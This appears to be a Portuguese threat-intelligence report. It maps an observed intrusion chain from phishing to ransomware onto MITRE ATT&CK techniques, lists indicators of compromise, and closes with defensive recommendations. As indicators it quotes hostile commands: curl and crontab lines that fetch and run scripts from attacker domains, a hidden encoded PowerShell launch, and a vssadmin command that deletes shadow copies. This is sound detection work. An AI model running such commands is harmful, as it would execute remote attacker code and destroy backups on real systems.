- Outubro 10, 2025
1. Acesso Inicial (Initial Access)
Técnicas Observadas
- Exploit de aplicações expostas à Internet (T1190)
- Spear Phishing (email com link ou anexo) (T1566.001 / T1566.002)
Indicadores Associados (IoCs)
Domínios suspeitos
- portal-auth[.]online
- secure-doc-share[.]site
- microsoft-login-verification[.]com
Ficheiros
- Invoice_0925.pdf.exe
- Payment_Request_Q3_2025.zip
Indicadores comportamentais
- Emails enviados fora do horário normal
- Linguagem de urgência (“ação imediata”, “conta suspensa”)
- Registo recente de domínios (<30 dias)
2. Execução (Execution)
Técnicas Observadas
- PowerShell ofuscado (T1059.001)
- Execução de scripts Bash / JavaScript (T1059)
Indicadores Associados
Comandos PowerShell
- Uso de:
- -enc
- -nop
- -w hidden
Exemplo típico
powershell -nop -w hidden -enc <base64>
Linux
curl -fsSL http://cdn-storage-sync[.]net/init.sh | bash
Ficheiros
- %AppData%\Local\Temp\update.exe
- /tmp/.cache/systemd-update
3. Persistência (Persistence)
Técnicas Observadas
- Serviços Windows maliciosos (T1543.003)
- Run Keys / Startup Folder (T1547.001)
- Crontab e systemd (Linux) (T1053.003)
Indicadores Associados
Windows – Registo
- HKCU\…\Run\SystemUpdate
- HKLM\…\RunOnce\SecurityFix
Windows – Serviços
- Windows Update Monitor
- System Health Service
- Executáveis fora de System32
Linux
- Crontab:
- */5 * * * * curl http://update-secure[.]cloud/p.sh | sh
- Serviços:
- systemd-update.service
4. Escalada de Privilégios (Privilege Escalation)
Técnicas Observadas
- Exploração de vulnerabilidades locais (T1068)
- Abuso de permissões mal configuradas (T1548)
Indicadores Associados
- Execução de exploits após acesso inicial
- Criação de processos como NT AUTHORITY\SYSTEM
- Alterações inesperadas a ACLs
5. Bypass a soluções de segurança (Defense Evasion)
Técnicas Observadas
- Ofuscação e encriptação de payloads (T1027)
- Desativação de EDR/AV (T1562)
Indicadores Associados
- Base64 e strings comprimidas
- Tentativas de parar serviços:
- Antivirus
- EDR
- Logging
6. Comando e Controlo (C2)
Técnicas Observadas
- Comunicação via HTTPS (T1071.001)
- DNS como canal C2 (T1071.004)
Indicadores Associados
Domínios C2
- update-secure[.]cloud
- cdn-storage-sync[.]net
- whatsapp-media-check[.]info
DNS
- Subdomínios aleatórios:
- a8f3k.update-secure[.]cloud
- TTL baixo (<300s)
IPs (VPS/Bulletproof )
- 45.8x.xxx.xxx
- 185.1xx.xxx.xxx
7. Movimento Lateral (Lateral Movement)
Técnicas Observadas
- Uso de credenciais válidas (T1078)
- SMB / WMI / PsExec (T1021.002 / T1047)
Indicadores Associados
- Autenticações com privilégios de admin fora do horário laboral
- Logins administrativos a partir de workstations
- Comandos:
- wmic process call create
- psexec
8. Exfiltração (Exfiltration)
Técnicas Observadas
- Exfiltração via canal C2 (T1041)
Indicadores Associados
- Uploads HTTPS frequentes para domínios recentes
- Tráfego DNS com payload codificado
- Criação prévia de ficheiros:
- .zip, .7z, .rar
9. Impacto (Impact)
Técnicas Observadas
- Ransomware (T1486)
- Eliminação de backups (T1490)
Indicadores Associados
- Extensões novas:
- .locked
- .enc2025
- .securePT
- Comandos:
vssadmin delete shadows /all /quiet
- Notas de resgate:
- README_RESTORE_FILES.txt
Visão Global – Cadeia de Ataque Observada
- Phishing ou exploração de CVE
- PowerShell / script ofuscado
- Persistência via serviços ou registo
- Escalada para SYSTEM
- Comunicação C2 via HTTPS/DNS
- Movimento lateral com credenciais válidas
- Exfiltração e/ou ransomware
Recomendações Operacionais
- Bloqueio de domínios recém-registados
- Alertas para PowerShell com -enc e -nop
- MFA obrigatório para contas privilegiadas
- Monitorização de DNS e tráfego HTTPS
- Segmentação de rede e hardening de AD
- Threat hunting baseado no MITRE ATT&CK
